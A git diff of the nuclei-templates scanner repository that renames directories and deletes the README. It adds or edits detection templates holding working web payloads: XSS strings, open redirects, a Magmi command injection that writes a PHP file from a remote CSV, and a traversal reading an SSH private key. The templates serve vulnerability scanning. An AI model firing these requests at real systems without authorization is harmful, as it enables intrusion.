misc

.github/scripts/README.tmpl

@@ -13,16 +13,15 @@ An overview of the nuclei template directory including number of templates and H
 
 ### Nuclei templates `{version}` overview
 
-| Templates          | Counts                           | Templates                 | Counts                                  |
-| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | {countTpl("cves/*")}             | files                     | {countTpl("files")}                     |
-| vulnerabilities    | {countTpl("vulnerabilities")}    | panels                    | {countTpl("panels")}                    |
-| technologies       | {countTpl("technologies")}       | security-misconfiguration | {countTpl("security-misconfiguration")} |
-| workflows          | {countTpl("workflows")}          | tokens                    | {countTpl("tokens")}                    |
-| dns                | {countTpl("dns")}                | fuzzing                   | {countTpl("fuzzing")}                   |
-| generic-detections | {countTpl("generic-detections")} | default-credentials       | {countTpl("default-credentials")}       |
-| subdomain-takeover | {countTpl("subdomain-takeover")} | payloads                  | {countTpl("payloads")}                  |
-| wordlists          | {countTpl("wordlists")}          | misc                      | {countTpl("misc")}                      |
+| Templates       | Counts                          | Templates        | Counts                         |
+| --------------- | ------------------------------- | ---------------- | ------------------------------ |
+| cves            | {countTpl("cves/*")}            | default-logins   | {countTpl("default-logins/*")} |
+| dns             | {countTpl("dns")}               | exposed-panels   | {countTpl("exposed-panels")}   |
+| exposed-tokens  | {countTpl("exposed-tokens/*")}  | exposures        | {countTpl("exposures/*")}      |
+| fuzzing         | {countTpl("fuzzing")}           | helpers          | {countTpl("helpers/*")}        |
+| miscellaneous   | {countTpl("miscellaneous")}     | misconfiguration | {countTpl("misconfiguration")} |
+| takeovers       | {countTpl("takeovers")}         | technologies     | {countTpl("technologies")}     |
+| vulnerabilities | {countTpl("vulnerabilities/*")} | workflows        | {countTpl("workflows")}        |
 
 
 ### Nuclei templates `{version}` tree overview

.nuclei-ignore

@@ -22,8 +22,8 @@ vulnerabilities/x-forwarded-host-injection.yaml
 fuzzing/
 
 # Wordlist directory contains payload to be used with templates. 
-wordlists/
-misc/
+helpers/
+miscellaneous/
 
 # Workflows are excluded from default run to avoid duplicate scans.
 workflows/

README.md

@@ -1,497 +0,0 @@
-
-# Nuclei Templates
-
-[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)
-[![GitHub Release](https://img.shields.io/github/release/projectdiscovery/nuclei-templates)](https://github.com/projectdiscovery/nuclei-templates/releases)
-[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei-templates/issues)
-[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
-[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
-
-Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
-
-An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
-
-### Nuclei templates `v7.3.7` overview
-
-| Templates          | Counts                           | Templates                 | Counts                                  |
-| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 147             | files                     | 51                     |
-| vulnerabilities    | 43    | panels                    | 50                    |
-| technologies       | 41       | security-misconfiguration | 29 |
-| workflows          | 17          | tokens                    | 8                    |
-| dns                | 6                | fuzzing                   | 6                   |
-| generic-detections | 3 | default-credentials       | 4       |
-| subdomain-takeover | 2 | payloads                  | 2                  |
-| wordlists          | 1          | misc                      | 14                      |
-
-
-### Nuclei templates `v7.3.7` tree overview
-
-<details>
-<summary> Nuclei templates </summary>
-
-```
-├── LICENSE.md
-├── README.md
-├── cves
-│   ├── 2005
-│   │   └── CVE-2005-2428.yaml
-│   ├── 2008
-│   │   └── CVE-2008-2398.yaml
-│   ├── 2013
-│   │   └── CVE-2013-2251.yaml
-│   ├── 2014
-│   │   └── CVE-2014-6271.yaml
-│   ├── 2017
-│   │   ├── CVE-2017-10075.yaml
-│   │   ├── CVE-2017-11444.yaml
-│   │   ├── CVE-2017-12637.yaml
-│   │   ├── CVE-2017-14537.yaml
-│   │   ├── CVE-2017-14849.yaml
-│   │   ├── CVE-2017-5638.yaml
-│   │   ├── CVE-2017-7391.yaml
-│   │   ├── CVE-2017-7615.yaml
-│   │   ├── CVE-2017-9506.yaml
-│   │   └── CVE-2017-9841.yaml
-│   ├── 2018
-│   │   ├── CVE-2018-0296.yaml
-│   │   ├── CVE-2018-1000129.yaml
-│   │   ├── CVE-2018-11409.yaml
-│   │   ├── CVE-2018-11759.yaml
-│   │   ├── CVE-2018-1247.yaml
-│   │   ├── CVE-2018-1271.yaml
-│   │   ├── CVE-2018-1273.yaml
-│   │   ├── CVE-2018-13379.yaml
-│   │   ├── CVE-2018-13380.yaml
-│   │   ├── CVE-2018-14728.yaml
-│   │   ├── CVE-2018-16341.yaml
-│   │   ├── CVE-2018-16763.yaml
-│   │   ├── CVE-2018-17431.yaml
-│   │   ├── CVE-2018-18069.yaml
-│   │   ├── CVE-2018-19386.yaml
-│   │   ├── CVE-2018-19439.yaml
-│   │   ├── CVE-2018-20824.yaml
-│   │   ├── CVE-2018-2791.yaml
-│   │   ├── CVE-2018-3714.yaml
-│   │   ├── CVE-2018-3760.yaml
-│   │   ├── CVE-2018-5230.yaml
-│   │   └── CVE-2018-7490.yaml
-│   ├── 2019
-│   │   ├── CVE-2019-1010287.yaml
-│   │   ├── CVE-2019-10475.yaml
-│   │   ├── CVE-2019-11248.yaml
-│   │   ├── CVE-2019-11510.yaml
-│   │   ├── CVE-2019-11580.yaml
-│   │   ├── CVE-2019-11581.yaml
-│   │   ├── CVE-2019-11869.yaml
-│   │   ├── CVE-2019-12314.yaml
-│   │   ├── CVE-2019-12461.yaml
-│   │   ├── CVE-2019-12593.yaml
-│   │   ├── CVE-2019-12725.yaml
-│   │   ├── CVE-2019-14322.yaml
-│   │   ├── CVE-2019-14696.yaml
-│   │   ├── CVE-2019-14974.yaml
-│   │   ├── CVE-2019-15043.yaml
-│   │   ├── CVE-2019-15107.yaml
-│   │   ├── CVE-2019-15858.yaml
-│   │   ├── CVE-2019-16278.yaml
-│   │   ├── CVE-2019-1653.yaml
-│   │   ├── CVE-2019-16662.yaml
-│   │   ├── CVE-2019-16759-1.yaml
-│   │   ├── CVE-2019-16759.yaml
-│   │   ├── CVE-2019-16920.yaml
-│   │   ├── CVE-2019-17382.yaml
-│   │   ├── CVE-2019-17558.yaml
-│   │   ├── CVE-2019-18394.yaml
-│   │   ├── CVE-2019-19368.yaml
-│   │   ├── CVE-2019-19781.yaml
-│   │   ├── CVE-2019-19908.yaml
-│   │   ├── CVE-2019-19985.yaml
-│   │   ├── CVE-2019-20141.yaml
-│   │   ├── CVE-2019-2588.yaml
-│   │   ├── CVE-2019-2725.yaml
-│   │   ├── CVE-2019-3396.yaml
-│   │   ├── CVE-2019-3402.yaml
-│   │   ├── CVE-2019-3799.yaml
-│   │   ├── CVE-2019-5418.yaml
-│   │   ├── CVE-2019-6112.yaml
-│   │   ├── CVE-2019-6340.yaml
-│   │   ├── CVE-2019-6715.yaml
-│   │   ├── CVE-2019-7256.yaml
-│   │   ├── CVE-2019-7609.yaml
-│   │   ├── CVE-2019-8442.yaml
-│   │   ├── CVE-2019-8449.yaml
-│   │   ├── CVE-2019-8451.yaml
-│   │   ├── CVE-2019-8903.yaml
-│   │   ├── CVE-2019-8982.yaml
-│   │   ├── CVE-2019-9670.yaml
-│   │   ├── CVE-2019-9733.yaml
-│   │   └── CVE-2019-9978.yaml
-│   └── 2020
-│       ├── CVE-2020-0618.yaml
-│       ├── CVE-2020-10148.yaml
-│       ├── CVE-2020-10199.yaml
-│       ├── CVE-2020-10204.yaml
-│       ├── CVE-2020-11034.yaml
-│       ├── CVE-2020-1147.yaml
-│       ├── CVE-2020-11738.yaml
-│       ├── CVE-2020-12116.yaml
-│       ├── CVE-2020-12720.yaml
-│       ├── CVE-2020-13167.yaml
-│       ├── CVE-2020-13942.yaml
-│       ├── CVE-2020-14179.yaml
-│       ├── CVE-2020-14181.yaml
-│       ├── CVE-2020-14864.yaml
-│       ├── CVE-2020-14882.yaml
-│       ├── CVE-2020-15129.yaml
-│       ├── CVE-2020-15505.yaml
-│       ├── CVE-2020-15920.yaml
-│       ├── CVE-2020-16139.yaml
-│       ├── CVE-2020-16846.yaml
-│       ├── CVE-2020-16952.yaml
-│       ├── CVE-2020-17505.yaml
-│       ├── CVE-2020-17506.yaml
-│       ├── CVE-2020-17518.yaml
-│       ├── CVE-2020-17519.yaml
-│       ├── CVE-2020-2096.yaml
-│       ├── CVE-2020-2140.yaml
-│       ├── CVE-2020-23972.yaml
-│       ├── CVE-2020-24223.yaml
-│       ├── CVE-2020-24312.yaml
-│       ├── CVE-2020-2551.yaml
-│       ├── CVE-2020-25540.yaml
-│       ├── CVE-2020-26214.yaml
-│       ├── CVE-2020-3187.yaml
-│       ├── CVE-2020-3452.yaml
-│       ├── CVE-2020-4463.yaml
-│       ├── CVE-2020-5284.yaml
-│       ├── CVE-2020-5405.yaml
-│       ├── CVE-2020-5410.yaml
-│       ├── CVE-2020-5412.yaml
-│       ├── CVE-2020-5776.yaml
-│       ├── CVE-2020-5777.yaml
-│       ├── CVE-2020-5902.yaml
-│       ├── CVE-2020-6287.yaml
-│       ├── CVE-2020-7209.yaml
-│       ├── CVE-2020-7318.yaml
-│       ├── CVE-2020-7961.yaml
-│       ├── CVE-2020-8091.yaml
-│       ├── CVE-2020-8115.yaml
-│       ├── CVE-2020-8163.yaml
-│       ├── CVE-2020-8191.yaml
-│       ├── CVE-2020-8193.yaml
-│       ├── CVE-2020-8194.yaml
-│       ├── CVE-2020-8209.yaml
-│       ├── CVE-2020-8512.yaml
-│       ├── CVE-2020-8982.yaml
-│       ├── CVE-2020-9047.yaml
-│       ├── CVE-2020-9344.yaml
-│       ├── CVE-2020-9484.yaml
-│       ├── CVE-2020-9496.yaml
-│       └── CVE-2020-9757.yaml
-├── default-credentials
-│   ├── grafana-default-credential.yaml
-│   ├── rabbitmq-default-admin.yaml
-│   ├── solarwinds-default-admin.yaml
-│   └── tomcat-manager-default.yaml
-├── dns
-│   ├── azure-takeover-detection.yaml
-│   ├── cname-service-detector.yaml
-│   ├── dead-host-with-cname.yaml
-│   ├── mx-service-detector.yaml
-│   ├── servfail-refused-hosts.yaml
-│   └── spoofable-spf-records-ptr.yaml
-├── files
-│   ├── apc-info.yaml
-│   ├── cgi-test-page.yaml
-│   ├── composer-config.yaml
-│   ├── docker-registry.yaml
-│   ├── domcfg-page.yaml
-│   ├── druid-monitor.yaml
-│   ├── drupal-install.yaml
-│   ├── ds_store.yaml
-│   ├── elasticsearch.yaml
-│   ├── elmah-log-file.yaml
-│   ├── error-logs.yaml
-│   ├── exposed-alps-spring.yaml
-│   ├── exposed-kibana.yaml
-│   ├── exposed-svn.yaml
-│   ├── filezilla.yaml
-│   ├── firebase-detect.yaml
-│   ├── git-config.yaml
-│   ├── graylog-api-browser.yaml
-│   ├── htpasswd-detection.yaml
-│   ├── jkstatus-manager.yaml
-│   ├── jolokia.yaml
-│   ├── laravel-env.yaml
-│   ├── lazy-file.yaml
-│   ├── magento-config.yaml
-│   ├── owncloud-config.yaml
-│   ├── package-json.yaml
-│   ├── php-errors.yaml
-│   ├── phpinfo.yaml
-│   ├── public-tomcat-instance.yaml
-│   ├── redmine-db-config.yaml
-│   ├── server-private-keys.yaml
-│   ├── server-status-localhost.yaml
-│   ├── shell-history.yaml
-│   ├── sql-dump.yaml
-│   ├── syfmony-profiler.yaml
-│   ├── telerik-dialoghandler-detect.yaml
-│   ├── telerik-fileupload-detect.yaml
-│   ├── tomcat-scripts.yaml
-│   ├── trace-axd-detect.yaml
-│   ├── wadl-files.yaml
-│   ├── web-config.yaml
-│   ├── wordpress-db-backup.yaml
-│   ├── wordpress-debug-log.yaml
-│   ├── wordpress-directory-listing.yaml
-│   ├── wordpress-emergency-script.yaml
-│   ├── wordpress-installer-log.yaml
-│   ├── wordpress-tmm-db-migrate.yaml
-│   ├── wordpress-user-enumeration.yaml
-│   ├── wsdl-detect.yaml
-│   ├── xprober-service.yaml
-│   └── zip-backup-files.yaml
-├── fuzzing
-│   ├── arbitrary-file-read.yaml
-│   ├── basic-auth-bruteforce.yaml
-│   ├── directory-traversal.yaml
-│   ├── generic-lfi-fuzzing.yaml
-│   ├── iis-shortname.yaml
-│   └── wp-plugin-scan.yaml
-├── generic-detections
-│   ├── basic-xss-prober.yaml
-│   ├── general-tokens.yaml
-│   └── top-15-xss.yaml
-├── misc
-│   ├── basic-cors-flash.yaml
-│   ├── dir-listing.yaml
-│   ├── htaccess-config.yaml
-│   ├── missing-csp.yaml
-│   ├── missing-hsts.yaml
-│   ├── missing-x-frame-options.yaml
-│   ├── ntlm-directories.yaml
-│   ├── old-copyright.yaml
-│   ├── robots.txt.yaml
-│   ├── security.txt.yaml
-│   ├── trace-method.yaml
-│   ├── unencrypted-bigip-ltm-cookie.yaml
-│   ├── wp-xmlrpc.yaml
-│   └── xml-schema-detect.yaml
-├── panels
-│   ├── adminer-panel.yaml
-│   ├── aims-password-mgmt-client.yaml
-│   ├── atlassian-crowd-panel.yaml
-│   ├── cisco-asa-panel.yaml
-│   ├── citrix-adc-gateway-detect.yaml
-│   ├── citrix-vpn-detect.yaml
-│   ├── compal.yaml
-│   ├── crxde.yaml
-│   ├── docker-api.yaml
-│   ├── fortinet-fortigate-panel.yaml
-│   ├── fortiweb-panel.yaml
-│   ├── github-enterprise-detect.yaml
-│   ├── gitlab-detect.yaml
-│   ├── globalprotect-panel.yaml
-│   ├── go-anywhere-client.yaml
-│   ├── grafana-detect.yaml
-│   ├── identityguard-selfservice-entrust.yaml
-│   ├── iomega-lenovo-emc-shared-nas-detect.yaml
-│   ├── jenkins-asyncpeople.yaml
-│   ├── jmx-console.yaml
-│   ├── kubernetes-pods.yaml
-│   ├── manage-engine-admanager-panel.yaml
-│   ├── mobileiron-login.yaml
-│   ├── netscaler-gateway.yaml
-│   ├── network-camera-detect.yaml
-│   ├── oipm-detect.yaml
-│   ├── parallels-html-client.yaml
-│   ├── phpmyadmin-panel.yaml
-│   ├── polycom-admin-detect.yaml
-│   ├── pulse-secure-panel.yaml
-│   ├── rabbitmq-dashboard.yaml
-│   ├── rsa-self-service.yaml
-│   ├── sap-hana-xsengine-panel.yaml
-│   ├── sap-netweaver-detect.yaml
-│   ├── sap-recon-detect.yaml
-│   ├── solarwinds-orion.yaml
-│   ├── sonarqube-login.yaml
-│   ├── sonicwall-management-panel.yaml
-│   ├── sonicwall-sslvpn-panel.yaml
-│   ├── sophos-fw-version-detect.yaml
-│   ├── supervpn-panel.yaml
-│   ├── swagger-panel.yaml
-│   ├── tikiwiki-cms.yaml
-│   ├── traefik-dashboard.yaml
-│   ├── virtual-ema-detect.yaml
-│   ├── weave-scope-dashboard-detect.yaml
-│   ├── webeditors.yaml
-│   ├── webmin-panel.yaml
-│   ├── workspace-one-uem.yaml
-│   └── workspaceone-uem-airwatch-dashboard-detect.yaml
-├── payloads
-│   ├── CVE-2020-5776.csv
-│   └── CVE-2020-6287.xml
-├── security-misconfiguration
-│   ├── aem-groovyconsole.yaml
-│   ├── apache-tomcat-snoop.yaml
-│   ├── aspx-debug-mode.yaml
-│   ├── basic-cors.yaml
-│   ├── django-debug-detect.yaml
-│   ├── drupal-user-enum-ajax.yaml
-│   ├── drupal-user-enum-redirect.yaml
-│   ├── exposed-service-now.yaml
-│   ├── front-page-misconfig.yaml
-│   ├── jenkins-stack-trace.yaml
-│   ├── jira-service-desk-signup.yaml
-│   ├── jira-unauthenticated-dashboards.yaml
-│   ├── jira-unauthenticated-popular-filters.yaml
-│   ├── jira-unauthenticated-projects.yaml
-│   ├── jira-unauthenticated-user-picker.yaml
-│   ├── jupyter-ipython-unauth.yaml
-│   ├── larvel-debug.yaml
-│   ├── manage-engine-ad-search.yaml
-│   ├── put-method-enabled.yaml
-│   ├── rack-mini-profiler.yaml
-│   ├── salesforce-aura-misconfig.yaml
-│   ├── sidekiq-dashboard.yaml
-│   ├── springboot-detect.yaml
-│   ├── unauthenticated-airflow.yaml
-│   ├── unauthenticated-jenkin-dashboard.yaml
-│   ├── unauthenticated-nacos-access.yaml
-│   ├── wamp-xdebug-detect.yaml
-│   ├── wordpress-accessible-wpconfig.yaml
-│   └── zenphoto-installation-sensitive-info.yaml
-├── subdomain-takeover
-│   ├── detect-all-takeovers.yaml
-│   └── s3-subtakeover.yaml
-├── technologies
-│   ├── apache-detect.yaml
-│   ├── artica-web-proxy-detect.yaml
-│   ├── basic-auth-detection.yaml
-│   ├── bigip-config-utility-detect.yaml
-│   ├── cacti-detect.yaml
-│   ├── clockwork-php-page.yaml
-│   ├── couchdb-detect.yaml
-│   ├── favicon-detection.yaml
-│   ├── google-storage.yaml
-│   ├── graphql.yaml
-│   ├── home-assistant.yaml
-│   ├── jaspersoft-detect.yaml
-│   ├── jira-detect.yaml
-│   ├── kibana-detect.yaml
-│   ├── kong-detect.yaml
-│   ├── liferay-portal-detect.yaml
-│   ├── linkerd-badrule-detect.yaml
-│   ├── linkerd-ssrf-detect.yaml
-│   ├── lotus-domino-version.yaml
-│   ├── magmi-detect.yaml
-│   ├── mrtg-detect.yaml
-│   ├── netsweeper-webadmin-detect.yaml
-│   ├── nifi-detech.yaml
-│   ├── oidc-detect.yaml
-│   ├── pi-hole-detect.yaml
-│   ├── prometheus-exporter-detect.yaml
-│   ├── prometheus-exposed-panel.yaml
-│   ├── prtg-detect.yaml
-│   ├── redmine-cli-detect.yaml
-│   ├── s3-detect.yaml
-│   ├── sap-netweaver-as-java-detect.yaml
-│   ├── sap-netweaver-detect.yaml
-│   ├── shiro-detect.yaml
-│   ├── sql-server-reporting.yaml
-│   ├── tech-detect.yaml
-│   ├── terraform-detect.yaml
-│   ├── tomcat-detect.yaml
-│   ├── tor-socks-proxy.yaml
-│   ├── waf-detect.yaml
-│   ├── weblogic-detect.yaml
-│   └── werkzeug-debugger-detect.yaml
-├── tokens
-│   ├── amazon-mws-auth-token-value.yaml
-│   ├── aws-access-key-value.yaml
-│   ├── credentials-disclosure.yaml
-│   ├── fcm-server-key.yaml
-│   ├── google-api-key.yaml
-│   ├── http-username-password.yaml
-│   ├── mailchimp-api-key.yaml
-│   └── slack-access-token.yaml
-├── vulnerabilities
-│   ├── bullwark-momentum-series-directory-traversal.yaml
-│   ├── cached-aem-pages.yaml
-│   ├── couchdb-adminparty.yaml
-│   ├── crlf-injection.yaml
-│   ├── discourse-xss.yaml
-│   ├── easy-wp-smtp-listing.yaml
-│   ├── eclipse-help-system-xss.yaml
-│   ├── git-config-nginxoffbyslash.yaml
-│   ├── ibm-infoprint-directory-traversal.yaml
-│   ├── mcafee-epo-rce.yaml
-│   ├── microstrategy-ssrf.yaml
-│   ├── mida-eframework-xss.yaml
-│   ├── moodle-filter-jmol-lfi.yaml
-│   ├── moodle-filter-jmol-xss.yaml
-│   ├── nginx-module-vts-xss.yaml
-│   ├── nuuo-nvrmini2-rce.yaml
-│   ├── open-redirect.yaml
-│   ├── oracle-ebs-bispgraph-file-access.yaml
-│   ├── pdf-signer-ssti-to-rce.yaml
-│   ├── rails6-xss.yaml
-│   ├── rce-shellshock-user-agent.yaml
-│   ├── rce-via-java-deserialization.yaml
-│   ├── rconfig-rce.yaml
-│   ├── sassy-social-share.yaml
-│   ├── sick-beard-xss.yaml
-│   ├── springboot-actuators-jolokia-xxe.yaml
-│   ├── springboot-h2-db-rce.yaml
-│   ├── symantec-messaging-gateway.yaml
-│   ├── symfony-debugmode.yaml
-│   ├── thinkific-redirect.yaml
-│   ├── tikiwiki-reflected-xss.yaml
-│   ├── tomcat-manager-pathnormalization.yaml
-│   ├── twig-php-ssti.yaml
-│   ├── vmware-vcenter-lfi-linux.yaml
-│   ├── vmware-vcenter-lfi.yaml
-│   ├── vpms-auth-bypass.yaml
-│   ├── w3c-total-cache-ssrf.yaml
-│   ├── wems-manager-xss.yaml
-│   ├── wordpress-emails-verification-for-woocommerce.yaml
-│   ├── wordpress-social-metrics-tracker.yaml
-│   ├── wordpress-wordfence-xss.yaml
-│   ├── wordpress-wpcourses-info-disclosure.yaml
-│   └── zms-auth-bypass.yaml
-├── wordlists
-│   └── wp-plugins.txt
-└── workflows
-    ├── artica-web-proxy-workflow.yaml
-    ├── basic-auth-workflow.yaml
-    ├── bigip-workflow.yaml
-    ├── cisco-asa-workflow.yaml
-    ├── grafana-workflow.yaml
-    ├── jira-workflow.yaml
-    ├── liferay-workflow.yaml
-    ├── lotus-domino-workflow.yaml
-    ├── magmi-workflow.yaml
-    ├── mida-eframework-workflow.yaml
-    ├── netsweeper-workflow.yaml
-    ├── rabbitmq-workflow.yaml
-    ├── sap-netweaver-workflow.yaml
-    ├── solarwinds-orion-workflow.yaml
-    ├── springboot-workflow.yaml
-    ├── vbulletin-workflow.yaml
-    └── wordpress-workflow.yaml
-```
-
-</details>
-
-**24 directories, 426 files**.
-
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
-
-------
-**Notes:** 
-1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
-2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
-
-Thanks again for your contribution and keeping the community vibrant. :heart:

cves/2017/CVE-2017-9506.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-9506
 
 info:
   name: Jira IconURIServlet SSRF
-  author: Ice3man
+  author: pd-team
   severity: high
   description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
 

cves/2018/CVE-2018-7251.yaml

@@ -0,0 +1,18 @@
+id: CVE-2018-7251
+
+info:
+  name: AnchorCMS Error Log Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/anchor/errors.log'
+    matchers:
+      - type: word
+        words:
+          - '"date":'
+          - '"message":'
+          - '"trace":['
+        condition: and

cves/2018/CVE-2018-8006.yaml

@@ -0,0 +1,20 @@
+id: CVE-2018-8006
+
+info:
+  name: Apache ActiveMQ XSS
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"><script>alert("1")</script>'
+      - type: word
+        words:
+          - "/html"
+        part: header

cves/2019/CVE-2019-10092.yaml

@@ -0,0 +1,15 @@
+id: CVE-2019-10092
+
+info:
+  name: Apache mod_proxy HTML Injection / Partial XSS
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/%5cgoogle.com/evil.html'
+    matchers:
+      - type: word
+        words:
+          - "<a href=\"/\\google.com/evil.html\">"

cves/2019/CVE-2019-14223.yaml

@@ -0,0 +1,19 @@
+id: CVE-2019-14223
+
+info:
+  name: Alfresco Share Open Redirect
+  author: pd-team
+  severity: low
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/share/page/dologin'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"

cves/2019/CVE-2019-7219.yaml

@@ -0,0 +1,26 @@
+id: CVE-2019-7219
+
+info:
+  name: Zarafa WebApp Reflected XSS
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\"><script>alert(1)</script>"
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

cves/2019/CVE-2019-9955.yaml

@@ -0,0 +1,18 @@
+id: CVE-2019-9955
+
+info:
+  name: CVE-2019-9955 Zyxel XSS
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\";alert('1');//"
+          - "<title>Welcome</title>"
+        condition: and

cves/2020/CVE-2020-12116.yaml

@@ -17,12 +17,6 @@ requests:
         Accept: */*
         Connection: close
 
-      - |
-        GET / HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Connection: close
-
       - |
         GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
         Host: {{Hostname}}
@@ -31,14 +25,6 @@ requests:
         Connection: close
         Referer: http://{{Hostname}}
 
-      - |
-        GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Cache-Control: max-age=0
-        Connection: close
-        Referer: http://{{Hostname}}:8060/
-
     extractors:
       - type: regex
         name: endpoint

cves/2020/CVE-2020-1943.yaml

@@ -0,0 +1,27 @@
+id: CVE-2020-1943
+
+info:
+  name: Apache OFBiz Reflected XSS
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-5776.yaml

@@ -20,7 +20,7 @@ requests:
         Content-type: application/x-www-form-urlencoded
         Connection: close
 
-        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
+        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
       - |
         POST /magmi/web/magmi_run.php HTTP/1.1
         Host: {{Hostname}}

cves/2020/CVE-2020-6287.yaml

@@ -17,7 +17,7 @@ info:
 
 requests:
   - payloads:
-      data: "payloads/CVE-2020-6287.xml"
+      data: helpers/payloads/CVE-2020-6287.xml
     raw:
       - |
         POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1

cves/2020/CVE-2020-7318.yaml

@@ -14,16 +14,12 @@ info:
     - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
 
 requests:
-  - payloads:
-      port:
-        - "80"
-        - "443"
-        - "8443"
-    raw:
+  - raw:
       - |
         GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
         Connection: close
+
     matchers-condition: and
     matchers:
       - type: status

cves/2020/CVE-2020-7961.yaml

@@ -18,15 +18,12 @@ requests:
         - "systeminfo"  # Windows
         - "lsb_release -a"  # Linux
         - "sysctl kern.ostype"  # macOS
-      port:
-        - "80"
-        - "443"
-        - "8080"
+
     attack: sniper
     raw:
       - |
         POST /api/jsonws/invoke HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
         Content-Length: 4938
         Accept: */*

default-logins/activemq/activemq-default-login.yaml

@@ -0,0 +1,22 @@
+id: activemq-default-login
+
+info:
+  name: Apache ActiveMQ Default Credentials
+  author: pd-team
+  severity: medium
+
+requests:
